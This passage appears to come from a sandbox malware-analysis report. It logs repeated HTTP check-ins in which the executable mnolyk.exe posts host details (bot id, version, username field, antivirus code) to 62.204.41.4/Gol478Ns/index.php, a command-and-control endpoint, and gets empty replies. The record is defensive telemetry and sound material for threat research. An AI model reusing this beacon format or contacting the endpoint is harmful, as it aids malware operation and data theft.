                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      517 | 192.168.2.7 | 50212 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:21.026369095 CET | 632 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.091089010 CET | 632 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      518 | 192.168.2.7 | 50213 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:21.269830942 CET | 633 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.333647966 CET | 633 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      519 | 192.168.2.7 | 50214 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:21.511863947 CET | 634 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.577199936 CET | 634 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      52 | 192.168.2.7 | 49747 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:14.171173096 CET | 167 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.233777046 CET | 167 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      520 | 192.168.2.7 | 50215 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:21.772161961 CET | 635 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.834883928 CET | 635 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      521 | 192.168.2.7 | 50216 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:22.010257959 CET | 636 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.076227903 CET | 636 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      522 | 192.168.2.7 | 50217 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:22.244328976 CET | 637 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.307096004 CET | 637 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      523 | 192.168.2.7 | 50218 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:22.479535103 CET | 638 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.542292118 CET | 638 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      524 | 192.168.2.7 | 50219 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:22.722186089 CET | 639 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.784706116 CET | 639 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      525 | 192.168.2.7 | 50220 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:22.982034922 CET | 640 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.048352957 CET | 640 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      526 | 192.168.2.7 | 50221 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:23.231200933 CET | 641 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.295761108 CET | 641 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      527 | 192.168.2.7 | 50222 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:23.463165045 CET | 642 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.525696039 CET | 642 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      528 | 192.168.2.7 | 50223 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:23.700905085 CET | 643 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.765327930 CET | 643 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      529 | 192.168.2.7 | 50224 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:23.949840069 CET | 644 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.015782118 CET | 644 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      53 | 192.168.2.7 | 49748 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:14.403703928 CET | 168 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.465245962 CET | 168 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      530 | 192.168.2.7 | 50225 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:24.183238983 CET | 645 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.246649027 CET | 645 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      531 | 192.168.2.7 | 50226 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:24.417895079 CET | 646 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.481350899 CET | 646 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      532 | 192.168.2.7 | 50227 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:24.691349983 CET | 647 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:24.755100012 CET | 647 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      533 | 192.168.2.7 | 50228 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:24.958281994 CET | 648 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
